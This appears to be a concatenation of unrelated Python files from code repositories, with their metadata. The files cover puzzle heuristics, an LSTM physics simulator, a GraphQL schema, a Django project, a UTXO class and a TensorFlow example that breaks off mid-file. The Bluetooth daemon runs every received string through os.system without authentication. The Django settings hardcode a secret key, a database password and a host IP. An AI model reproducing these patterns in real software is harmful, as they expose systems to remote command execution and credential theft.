elif(evaluation_method=='bad'):
return self._evaluate_opposites()
def _evaluate_manhattan(self):
sum = 0
for row in range(0, 3):
for col in range(0, 3):
tile = self.board[row][col]
if(tile>0):
for m in range(0, 3):
for n in range(0, 3):
if tile == self._goal[m][n]:
sum += abs(row-m) + abs(col-n)
return sum
def _evaluate_nilsson_sequence(self):
# inspired by the answer here: https://cs.stackexchange.com/questions/1904/nilssons-sequence-score-for-8-puzzle-problem-in-a-algorithm?rq=1
# if the empty box is not in the middle, start with cost 1
total_score = 0 if self.board[1][1]==0 else 1
# add manhattan distance cost
distance_cost = self._evaluate_manhattan()
# successors
successor_cost = 0
goal_pairs = list([[1,2],[2,3],[3,5],[5,8],[8,7],[7,6],[6,4],[4,1]])
if([self.board[0][0],self.board[0][1]] not in goal_pairs): successor_cost+=1
if([self.board[0][1],self.board[0][2]] not in goal_pairs): successor_cost+=1
if([self.board[0][2],self.board[1][2]] not in goal_pairs): successor_cost+=1
if([self.board[1][2],self.board[2][2]] not in goal_pairs): successor_cost+=1
if([self.board[2][2],self.board[2][1]] not in goal_pairs): successor_cost+=1
if([self.board[2][1],self.board[2][0]] not in goal_pairs): successor_cost+=1
if([self.board[2][0],self.board[1][0]] not in goal_pairs): successor_cost+=1
return distance_cost + 3 * (total_score + 2*successor_cost)
def _evaluate_hamming(self):
sum = 0
for row in range(0, 3):
for col in range(0, 3):
tile = self.board[row][col]
if(tile!=self._goal[row][col]):
sum += 1
return sum
def _evaluate_opposites(self):
sum = 0
sum += abs(self.board[0][0] - self.board[2][2])
sum += abs(self.board[0][1] - self.board[2][1])
sum += abs(self.board[0][2] - self.board[2][0])
sum += abs(self.board[1][0] - self.board[1][2])
return abs(16-sum)
|
[
"Sam.Vanhoutte@codit.eu"
] |
Sam.Vanhoutte@codit.eu
|
4db3e4c30c7da93ef32b7bb65f05b44b0b744e49
|
416ad9ba952c563b9600c040d72d4bea8c6ac926
|
/src/lstm.py
|
380ce67a2254f609e2192219a0070e0440e8661c
|
[] |
no_license
|
bokutotu/Simulate
|
3d990d75666abec8e5c07a90d8d4720137f95c7d
|
a95826127df4ffdcbbf2ccbadea8262aa84ccdd5
|
refs/heads/main
| 2023-06-21T01:04:19.079336
| 2021-07-20T13:30:54
| 2021-07-20T13:30:54
| 387,800,087
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,441
|
py
|
import numpy as np
import torch
import leapfrog
import preprocess
class LSTMLeapFrog(leapfrog.LeapFrog):
def __init__(self, sim_len, atom_num, norm,
chainlen_c, floatlen_c, chainlen_v, floatlen_v,
coord, velocity, force,
net_n, net_ca, net_c, net_o,
feature_len, name, in_channels, in_channels_o):
super().__init__(sim_len, atom_num, norm,
coord, velocity, force,
net_n, net_ca, net_c, net_o)
self.feature_len = feature_len
self.name = name
self.device = "cuda:0" if torch.cuda.is_available() else "cpu"
self.in_channels = in_channels
self.in_channels_o = in_channels_o
self.chainlen_c = chainlen_c
self.floatlen_c = floatlen_c
self.chainlen_v = chainlen_v
self.floatlen_v = floatlen_v
def before_sim(self):
self.res_coord = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_velocity = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_force = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_coord[0:self.feature_len] = self.coord
self.res_velocity[0:self.feature_len] = self.velocity
self.res_force[0:self.feature_len] = self.force
self.features_ca = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_c = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_n = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_o = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4, self.in_channels_o),
dtype=np.float32)
# 一回目のために0~feature_len - 1 までの特徴量を作成
for time in range(self.feature_len-1):
f_n, f_ca, f_c, f_o, b_n, b_ca, b_c, b_o = \
preprocess.make_single(
chainlen_c=self.chainlen_c, floatlen_c=self.floatlen_c,
chainlen_v=self.chainlen_v, floatlen_v=self.floatlen_v,
atom_num=self.atom_num,
c=self.res_coord[time], v=self.res_velocity[time],
is_use_angles=True
)
self.features_n[time] = f_n
self.features_ca[time] = f_ca
self.features_c[time] = f_c
self.features_o[time] = f_o
def simulation_step(self, time):
# time - 1 の特徴量の計算と代入
f_n, f_ca, f_c, f_o, b_n, b_ca, b_c, b_o = \
preprocess.make_single(
chainlen_c=self.chainlen_c, floatlen_c=self.floatlen_c,
chainlen_v=self.chainlen_v, floatlen_v=self.floatlen_v,
atom_num=self.atom_num,
c=self.res_coord[time+self.feature_len-1],
v=self.res_velocity[time+self.feature_len-1],
is_use_angles=True
)
self.features_n[time+self.feature_len-1] = f_n
self.features_ca[time+self.feature_len-1] = f_ca
self.features_c[time+self.feature_len-1] = f_c
self.features_o[time+self.feature_len-1] = f_o
# 入力に必要な特徴量の切り出し
input_tensor_ca = torch.tensor(self.features_ca[time:time+self.feature_len]) \
.to(self.device)
input_tensor_c = torch.tensor(self.features_c[time:time+self.feature_len]) \
.to(self.device)
input_tensor_n = torch.tensor(self.features_n[time:time+self.feature_len]) \
.to(self.device)
input_tensor_o = torch.tensor(self.features_o[time:time+self.feature_len]) \
.to(self.device)
# ニューラルネットが学習する際の次元に変更する
# (features_len, atom_num, in_channnels) -> (atom_num, features_len, in_channnels)
input_tensor_c = input_tensor_c.transpose(0,1)
input_tensor_ca = input_tensor_ca.transpose(0,1)
input_tensor_n = input_tensor_n.transpose(0,1)
input_tensor_o = input_tensor_o.transpose(0,1)
# ニューラルネットで予測
force_n, force_ca, force_c, force_o = \
self.pred_nn(input_tensor_n, input_tensor_ca, input_tensor_c, input_tensor_o)
# 使用するのは一番最後に予測されたものを使用する
force_ca = force_ca[::, -1, ::]
force_c = force_c[::, -1, ::]
force_n = force_n[::, -1, ::]
force_o = force_o[::, -1, ::]
force = leapfrog.rotate_force(force_n,force_ca, force_c, force_o,
b_n, b_ca, b_c, b_o, self.atom_num, self.norm)
# 速度を計算する
v_now = leapfrog.cal_v_2(self.res_velocity[time+self.feature_len -1], self.mass, force)
self.res_velocity[time+self.feature_len] = v_now
# 座標を計算
c_now = leapfrog.cal_coord(self.res_coord[time, self.feature_len - 1], v_now)
self.res_coord[time + self.feature_len] = c_now
def save(self):
np.save(self.name, self.res_coord[self.feature_len:-1:])
|
[
"mushin.hudoushin@gmail.com"
] |
mushin.hudoushin@gmail.com
|
acbabc06e4dc6b096ab6dffc2dd92e71c90c3e59
|
3a08e9facc8df83f8e8eed4859ef59ee5200aa14
|
/rough_trade_calendar/graphql.py
|
f3894ce294cb936586401b752f32f355cd2302b4
|
[
"MIT"
] |
permissive
|
craiga/rough-trade-calendar
|
c7fe9125949a7ff1ac38acf73d51765ffbed8ad4
|
175c61391a50eaa4ada3dbc062158773cf72d9c0
|
refs/heads/main
| 2021-11-11T07:50:02.808052
| 2021-08-11T13:07:16
| 2021-08-11T13:07:16
| 194,937,687
| 1
| 1
|
MIT
| 2021-11-09T08:09:42
| 2019-07-02T21:32:28
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,875
|
py
|
"""
GraphQL + Relay interface to Rough Trade Calendar data.
"""
import django_filters
import graphene
import graphene.relay
from graphene_django import DjangoObjectType
from graphene_django.filter import DjangoFilterConnectionField
from rough_trade_calendar import models
class CountConnection(graphene.Connection):
"""A connection which supports Relay's totalCount field."""
total_count = graphene.Int()
def resolve_total_count(self, *args): # pylint: disable=unused-argument
return self.length # pylint: disable=no-member
class Meta:
abstract = True
class EventFilterSet(django_filters.FilterSet):
"""Filter and order events by start_at."""
start_after = django_filters.DateTimeFilter("start_at", "gt")
start_before = django_filters.DateTimeFilter("start_at", "lt")
order_by = django_filters.OrderingFilter(fields={"start_at": "startAt"})
class Meta:
model = models.Event
fields = ["start_after", "start_before"]
class Event(DjangoObjectType):
"""An event."""
class Meta:
model = models.Event
fields = [
"id",
"name",
"description",
"url",
"image_url",
"start_at",
"location",
]
filterset_class = EventFilterSet
interfaces = [graphene.relay.Node]
connection_class = CountConnection
class Location(DjangoObjectType):
"""A location."""
class Meta:
model = models.Location
fields = ["id", "name", "timezone", "events"]
interfaces = [graphene.relay.Node]
connection_class = CountConnection
filter_fields = {"name": ["exact", "contains"]}
class Query(graphene.ObjectType):
all_locations = DjangoFilterConnectionField(Location, description="All locations.")
schema = graphene.Schema(query=Query)
|
[
"craiga@craiga.id.au"
] |
craiga@craiga.id.au
|
1ac88f58fc4e55c54fef3bbf16f971a05570079f
|
90af0a07a800fe88902e5c8c160e39456ecf9f5b
|
/pydir/daemon-rxcmd.py
|
00f98fcc7ad708cdb8461545e3e983acadcf9667
|
[
"Apache-2.0"
] |
permissive
|
jmdahling/RxCmd
|
8fb1cdc32764947b35416a46e2a0764634784cea
|
000375e30f1cee622c188967b8de7874e982fd0d
|
refs/heads/master
| 2021-01-19T19:45:46.878305
| 2017-04-16T19:43:28
| 2017-04-16T19:43:28
| 88,442,730
| 0
| 0
| null | 2017-04-16T21:10:04
| 2017-04-16T21:10:04
| null |
UTF-8
|
Python
| false
| false
| 1,253
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 F Dou<programmingrobotsstudygroup@gmail.com>
# See LICENSE for details.
import bluetooth
import os
import logging
import time
from daemon import runner
class RxCmdDaemon():
def __init__(self):
self.stdin_path = '/dev/null'
# self.stdout_path = '/dev/tty'
self.stdout_path = '/home/robot/pydir/daemon.log'
self.stderr_path = '/home/robot/pydir/daemon.log'
# self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/RxCmdDaemon.pid'
self.pidfile_timeout = 5
def run(self):
while True:
server_sock=bluetooth.BluetoothSocket( bluetooth.RFCOMM )
port = 1
server_sock.bind(("",port))
server_sock.listen(1)
client_sock,address = server_sock.accept()
print "Accepted connection from ",address
try:
while True:
data = client_sock.recv(1024)
print "received [%s]" % data
os.system(data)
except Exception as e:
logging.exception(e)
rxCmdDaemon = RxCmdDaemon()
daemon_runner = runner.DaemonRunner(rxCmdDaemon)
daemon_runner.do_action()
|
[
"javatechs@gmail.com"
] |
javatechs@gmail.com
|
35a7b100287d182cc18bd381c35f0962b21d2a4c
|
481f1f66071fc9b9eb8ea88e4df4e5186d99cdab
|
/cs540_project/settings.py
|
ed9c788dfa04191afa583308024095f3d3d778dc
|
[] |
no_license
|
tso2381637/cs540_project
|
3cc1cee12095377c16046f666a4ab077bcf08508
|
1803d0ce87465032c8921bec64f0e0dd82c82cd4
|
refs/heads/master
| 2021-02-11T17:44:48.363496
| 2020-03-13T04:31:10
| 2020-03-13T04:31:10
| 244,514,913
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,390
|
py
|
"""
Django settings for cs540_project project.
Generated by 'django-admin startproject' using Django 2.2.10.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')4@vhi%0rq(h@=uwzwb1y&@am=kob=))kvat5xqqw9l0jne(##'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'home.apps.HomeConfig',
'rest_framework',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cs540_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cs540_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'crash_data',
'USER': 'eason',
'PASSWORD': 'pa55word',
'HOST': '34.83.53.44', # Or an IP Address that your DB is hosted on
'PORT': '3306',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
DATETIME_FORMAT = '%m/%d/%Y %I:%M'
|
[
"tso2381637@gmail.com"
] |
tso2381637@gmail.com
|
fb9ba2d39a850faee8978b4ef1f593af35a95224
|
fd71857adc56fe72bbb3c302a1013e8de8511c50
|
/bitcoin/utxo.py
|
b95630c872cd8cc9007f834a233bda67c0d03e98
|
[] |
no_license
|
AbhishekAshokDubey/blockchain_python
|
a209b5f23e16c5e8b1739a57eecfd95952ed52ae
|
e64c72420bfe746a87f5255f94a8f4c1cf1a8789
|
refs/heads/master
| 2020-03-25T14:36:47.942295
| 2018-08-07T11:29:50
| 2018-08-07T11:29:50
| 143,863,591
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,156
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 27 15:44:15 2018
@author: ADubey4
"""
"""Done"""
# http://gerg.ca/blog/post/2012/python-comparison/
# https://docs.python.org/3.5/library/functools.html#functools.total_ordering
from functools import total_ordering
import copy
@total_ordering
class UTXO :
@staticmethod
def cmp(a, b):
return (a > b) - (a < b)
def __init__(self, tx_hash, index):
self.tx_hash = copy.copy(tx_hash)
self.index = index
def equals(self, other_utxo=None):
return ((self.tx_hash == other_utxo.tx_hash) and (self.index == other_utxo.index))
def get_hash_code(self):
hash_code = 1
hash_code = 17 + self.index
hash_code = hash_code * 31 + hash(self.tx_hash)
return hash_code
## everything below: the way to implemet a comparable in python
def __cmp__(self, other_utxo):
other_hashcode = other_utxo.tx_hash
other_index = other_utxo.index
if(other_index > self.index):
return -1
elif (other_index < self.index):
return 1
else:
if len(other_hashcode) > len(self.tx_hash):
return -1
elif len(other_hashcode) < len(self.tx_hash):
return 1
else:
return self.cmp(self.tx_hash, other_hashcode)
# __cmp__ is removed from python 3.X and hence we need to implemet something move
def __eq__(self, other):
return self.__cmp__(other) == 0
def __lt__(self, other):
return self.__cmp__(other) < 0
# required only when we use the object as dict key or in set
# as they Data structures uses hash internally
# def __hash__(self):
# return self.get_hash_code()
# below code is not required because of @total_ordering, else we would need everything below
# def __ne__(self, other):
# return self.__cmp__(other) != 0
# def __gt__(self, other):
# return self.__cmp__(other) > 0
# def __ge__(self, other):
# return self.__cmp__(other) >= 0
# def __le__(self, other):
# return self.__cmp__(other) <= 0
|
[
"adubey4@slb.com"
] |
adubey4@slb.com
|
15959d749cf76018d3d00dfa9cafa9d7699348b9
|
7e820bcff319b61b0905f6839743155a450d3cfb
|
/data/scripts/xyf.py
|
57902dd0f473723f1289508d0ca1306bffb99c78
|
[] |
no_license
|
ShadowLugia650/pokemon-tcg
|
6636a12f15ab5f0fe2b4da85056d844651ec6f33
|
333df6e0303acac361140501b4f98f9c45296435
|
refs/heads/master
| 2022-11-19T23:02:12.657279
| 2020-06-28T04:31:59
| 2020-06-28T04:31:59
| 257,483,793
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 269
|
py
|
from data.scripts._util import check_energy_cost
def scratch(attacker, defender):
check_energy_cost(attacker, 1)
defender.take_damage(10, attacker)
def tailsmack(attacker, defender):
check_energy_cost(attacker, 2)
defender.take_damage(20, attacker)
|
[
"mkwoo@wisc.edu"
] |
mkwoo@wisc.edu
|
5b2cb107207f28aa4fb223e5d981c7c6eb002b41
|
8d6dc6024e8aca3ab1e11514f9c36911e5225df2
|
/004_Homework/viking_loto.py
|
7d5f868e4d9876867d9e0be4d12a83812dad7f71
|
[] |
no_license
|
JanaSed/Homeworks
|
16bfeecd35eeb853c9e72108c3fb5e5419bb8f8f
|
efe0de7174385563358c48f5d67da5e05d686e66
|
refs/heads/master
| 2023-07-04T21:54:21.279882
| 2021-08-16T17:52:28
| 2021-08-16T17:52:28
| 379,962,510
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 113
|
py
|
import random
from random import randint
print(random.sample(range(48), 6))
print(random.sample(range(1, 5), 1))
|
[
"j.sedasheva@gmail.com"
] |
j.sedasheva@gmail.com
|
a747f23ed4a39749024d5edcb173888590294a8f
|
fc220ec70c38972e97a9b549c14262a5ed1aa6a9
|
/mac/__init__.py
|
8ea3bdb9386d6db6e470175f089de02e8886e1be
|
[] |
no_license
|
adrienpaysant/hashesAndMACs
|
adbb1ab869a4a2d14a002ab8dae340473c33f9af
|
0454ed8499aa82d06ea713c66bc5d58628249264
|
refs/heads/main
| 2023-04-17T05:47:52.372755
| 2021-04-29T13:48:32
| 2021-04-29T13:48:32
| 358,198,378
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
from .communication import send_message_digest, get_message_digest, get_message, get_digest, send_message, send_digest
__all__ = [ 'send_message_digest', 'get_message_digest', 'get_message', 'get_digest', 'send_message', 'send_digest']
|
[
"edouard.goffinet@he-arc.ch"
] |
edouard.goffinet@he-arc.ch
|
4e6c7d73d626383ba1cf1342cec8ceeefd7552ac
|
e6cc19f280d737e4c37ad499c9c5370ec9079a1f
|
/project_euler_solutions/problem_9.py
|
e18867f8541e3b78ce778214acc2cc1a408672a8
|
[] |
no_license
|
jdgsmallwood/ProjectEuler
|
f705611b903d6615894b60c087ee2e74088715c2
|
f310421ca82046fdf18f606e8752ed9ce6c8be36
|
refs/heads/master
| 2023-01-07T16:08:46.165465
| 2020-11-14T00:57:01
| 2020-11-14T00:57:01
| 111,932,708
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 417
|
py
|
target = 1000
#We're making an assumption without loss of generality that a < b < c
for a in range(1,1000):
for b in range(a,1000):
c = 1000 - a - b
if a**2 + b**2 == c**2:
if a + b+ c == target:
print('A: %f' % a)
print('B: %f'% b)
print("C: %f" % c)
print(a*b*c)
break
# I think the answer is 31875000
|
[
"justin.d.smallwood@gmail.com"
] |
justin.d.smallwood@gmail.com
|
8a8680338eb791a54e04854473d5d7158ca44726
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/pytype/pytype/tools/merge_pyi/test_data/var_annot.comment.py
|
8d3907c0a79e522e7a66e1587e8a8ca132b76a38
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:fbf532cb3bc3376967d6a665559e5b50273ee6371ee9080fcc2f2d7e3592c2eb
size 156
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
1d4206c56fddce6446aff8d1c579022e0ed24186
|
b3a79effcc09df60100dd28d333b60be99ed75a2
|
/app/salaries/migrations/0002_salary.py
|
1601ad14a7d51cdf8bfb44c9de34fd1f64744256
|
[] |
no_license
|
claytonrm/upsalary-django-project
|
b4d4e021b280b72bf50b4d08e77b940787622d74
|
6d9de78c189d78a5ce237062a54256b28b82bd60
|
refs/heads/master
| 2023-08-03T14:42:36.020401
| 2020-07-09T14:37:09
| 2020-07-09T14:37:09
| 265,437,864
| 0
| 0
| null | 2021-09-22T19:02:53
| 2020-05-20T03:19:58
|
Python
|
UTF-8
|
Python
| false
| false
| 678
|
py
|
# Generated by Django 3.0.6 on 2020-05-20 18:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('salaries', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Salary',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.DecimalField(decimal_places=2, max_digits=19)),
('taxes', models.DecimalField(decimal_places=2, max_digits=19)),
('received_at', models.DateTimeField(editable=False)),
],
),
]
|
[
"claytonrmendonca@gmail.com"
] |
claytonrmendonca@gmail.com
|
ed56edac7dcdd5606246aad436c9d852a3f3f40f
|
786f34fc2fea4f764d083b2bb3fd75222dfbbac1
|
/jobsPortal/jobsPortal/urls.py
|
df7cc52aa22d588c3e134c6f19a0b5e4a7a1e052
|
[] |
no_license
|
shivendra04/DjangoProjects
|
6c4ddc58588c7033afa7a1f5a299e33b1afb3897
|
d3a190fd47582190f2ad41d8dc4b30b7841cf679
|
refs/heads/master
| 2022-12-20T00:01:22.524044
| 2020-09-22T08:05:43
| 2020-09-22T08:05:43
| 297,578,265
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 994
|
py
|
"""jobsPortal URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from jobsApp import views
urlpatterns = [
path('admin/', admin.site.urls),
path('home/', views.home),
path('home/hydjobs/', views.hydjob),
path('home/punejobs/', views.punejob),
path('home/banglorejobs/', views.banglorejob),
path('home/chennaijobs/', views.chennaijob),
]
|
[
"52535417+shivendra04@users.noreply.github.com"
] |
52535417+shivendra04@users.noreply.github.com
|
419b271226298b03583d193a10914df6729aeb1c
|
137e4fc41341350550106ce897eba9617e34a4d5
|
/example_feedback/urls.py
|
4a76a819aa393aba1b5d28aa927a76b6b5be0963
|
[] |
no_license
|
javierLiarte/django-simple-feedback-1
|
888425d288965ad8ee581d91be12af28ee87d14e
|
1aca0df0b9a1773624bfb3d3ba6aa8696d8d239b
|
refs/heads/master
| 2021-01-17T06:56:47.592413
| 2014-10-10T15:42:58
| 2014-10-10T15:42:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 825
|
py
|
from django.conf.urls.defaults import patterns, include, url
from django.views.generic.simple import direct_to_template
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url('^$', direct_to_template, {'template': 'base.html'}),
url('^feedback/$', include('feedback.urls')),
(r'^accounts/login/$', 'django.contrib.auth.views.login'),
# Examples:
# url(r'^$', 'example_feedback.views.home', name='home'),
# url(r'^example_feedback/', include('example_feedback.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
)
|
[
"nicolas@kwyk.fr"
] |
nicolas@kwyk.fr
|
1a2f1f8498afde855fe2f89df29272d73550da39
|
100d4ef3ac2d288b45430650730eaff1a0e5fb05
|
/Backend/process.py
|
eaf6e61e7206b9b33d40f2d9ed2f7f4695aeb092
|
[] |
no_license
|
billbai0102/SGMT
|
107782b862031deaca1ac91e4b225b9199e4eab2
|
c8303effc8dfada9e5381b09e17e350c5ca8c094
|
refs/heads/main
| 2022-12-26T17:35:57.738188
| 2020-10-07T14:37:38
| 2020-10-07T14:37:38
| 300,917,335
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
import cv2
import torch
import numpy as np
def preprocess_mri(image):
image = cv2.resize(image, (256, 256))
image = torch.tensor(image.astype(np.float32))
image = image.unsqueeze(0)
image = image.permute(0, 3, 1, 2)
return image
def postprocess_mask(mask):
mask = mask.detach()
mask = mask.cpu()
mask = mask.numpy()[0, 0, :, :] # grayscale to rgb
return mask
|
[
"31229051+billbai0102@users.noreply.github.com"
] |
31229051+billbai0102@users.noreply.github.com
|
0efae463197cf4b67c08549dc4459158bc1c5d11
|
a3c7c11c607800155457ea1f886e2d84eadd9610
|
/examples/3_NeuralNetworks/convolutional_network.py
|
17aa1d84f64834e38d5523b130d66d3e697d1ee0
|
[
"MIT"
] |
permissive
|
353622088/CapsNet
|
eddba478143bd092ce27bd49dbb65c63d80824e4
|
04408978dfccd9a6545fc250648fd2f600974a95
|
refs/heads/master
| 2021-08-28T02:22:56.958370
| 2017-12-11T03:03:52
| 2017-12-11T03:03:52
| 112,295,252
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,934
|
py
|
""" Convolutional Neural Network.
Build and train a convolutional neural network with TensorFlow.
This example is using the MNIST database of handwritten digits
(http://yann.lecun.com/exdb/mnist/)
This example is using TensorFlow layers API, see 'convolutional_network_raw'
example for a raw implementation with variables.
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
"""
from __future__ import division, print_function, absolute_import
# Import MNIST data
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("../tmp/data/", one_hot=False)
import tensorflow as tf
# Training Parameters
learning_rate = 0.001
num_steps = 2000
batch_size = 128
# Network Parameters
num_input = 784 # MNIST data input (img shape: 28*28)
num_classes = 10 # MNIST total classes (0-9 digits)
dropout = 0.75 # Dropout, probability to keep units
# Create the neural network
def conv_net(x_dict, n_classes, dropout, reuse, is_training):
# Define a scope for reusing the variables
with tf.variable_scope('ConvNet', reuse=reuse):
# TF Estimator input is a dict, in case of multiple inputs
x = x_dict['images']
# MNIST data input is a 1-D vector of 784 features (28*28 pixels)
# Reshape to match picture format [Height x Width x Channel]
# Tensor input become 4-D: [Batch Size, Height, Width, Channel]
x = tf.reshape(x, shape=[-1, 28, 28, 1])
# Convolution Layer with 32 filters and a kernel size of 5
conv1 = tf.layers.conv2d(x, 32, 5, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv1 = tf.layers.max_pooling2d(conv1, 2, 2)
# Convolution Layer with 64 filters and a kernel size of 3
conv2 = tf.layers.conv2d(conv1, 64, 3, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv2 = tf.layers.max_pooling2d(conv2, 2, 2)
# Flatten the data to a 1-D vector for the fully connected layer
fc1 = tf.contrib.layers.flatten(conv2)
# Fully connected layer (in tf contrib folder for now)
fc1 = tf.layers.dense(fc1, 1024)
# Apply Dropout (if is_training is False, dropout is not applied)
fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)
# Output layer, class prediction
out = tf.layers.dense(fc1, n_classes)
return out
# Define the model function (following TF Estimator Template)
def model_fn(features, labels, mode):
# Build the neural network
# Because Dropout have different behavior at training and prediction time, we
# need to create 2 distinct computation graphs that still share the same weights.
logits_train = conv_net(features, num_classes, dropout, reuse=False,
is_training=True)
logits_test = conv_net(features, num_classes, dropout, reuse=True,
is_training=False)
# Predictions
pred_classes = tf.argmax(logits_test, axis=1)
pred_probas = tf.nn.softmax(logits_test)
# If prediction mode, early return
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode, predictions=pred_classes)
# Define loss and optimizer
print(logits_train.shape)
print(labels.shape)
loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits_train, labels=tf.cast(labels, dtype=tf.int32)))
# tf.summary.scalar(name='loss', tensor=loss_op)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss_op,
global_step=tf.train.get_global_step())
# Evaluate the accuracy of the model
acc_op = tf.metrics.accuracy(labels=labels, predictions=pred_classes)
# merge_all_op = tf.summary.merge_all()
# TF Estimators requires to return a EstimatorSpec, that specify
# the different ops for training, evaluating, ...
estim_specs = tf.estimator.EstimatorSpec(
mode=mode,
predictions=pred_classes,
loss=loss_op,
train_op=train_op,
eval_metric_ops={'accuracy': acc_op})
return estim_specs
# Build the Estimator
model = tf.estimator.Estimator(model_fn, model_dir='logdir')
# Define the input function for training
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': mnist.train.images}, y=mnist.train.labels,
batch_size=batch_size, num_epochs=None, shuffle=True)
# Train the Model
model.train(input_fn, steps=num_steps)
# Evaluate the Model
# Define the input function for evaluating
input_fn = tf.estimator.inputs.numpy_input_fn(
